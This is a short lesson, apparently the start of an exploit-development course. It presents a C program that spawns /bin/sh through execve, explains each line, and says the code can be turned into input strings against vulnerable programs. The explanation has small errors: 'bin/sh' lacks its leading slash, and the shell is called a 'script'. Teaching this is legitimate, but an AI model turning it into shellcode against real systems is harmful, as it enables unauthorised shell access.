Lesson 1
#include <stdio.h>
int main()
{
char *args[2];
args[0] = "bin/sh";
args[1] = NULL;
execve("/bin/sh", args, NULL);
return 0;
}
Breakdown of code:
#include <stdio.h> This enables input and output operations.
int main() This is the main function declaration where the program execution begins from here.
char *args[2]; Here we have an argument array of size two.
args[0] Here we have argument Zero. This is the first element of args, which is assigned the path of the shell executable here.
args[1] = NULL Here is the second element of args which is NULL, indicating the end of the argument list.
execve This function is invoked to execute the shell script with the provided arguments. So this essentially spawns a new shell process.
return 0; This function returns zero indicating a successful execution.
So this code, when compiled and modified, can be transformed into input strings usable against vulnerable programs.
Learning Objectives: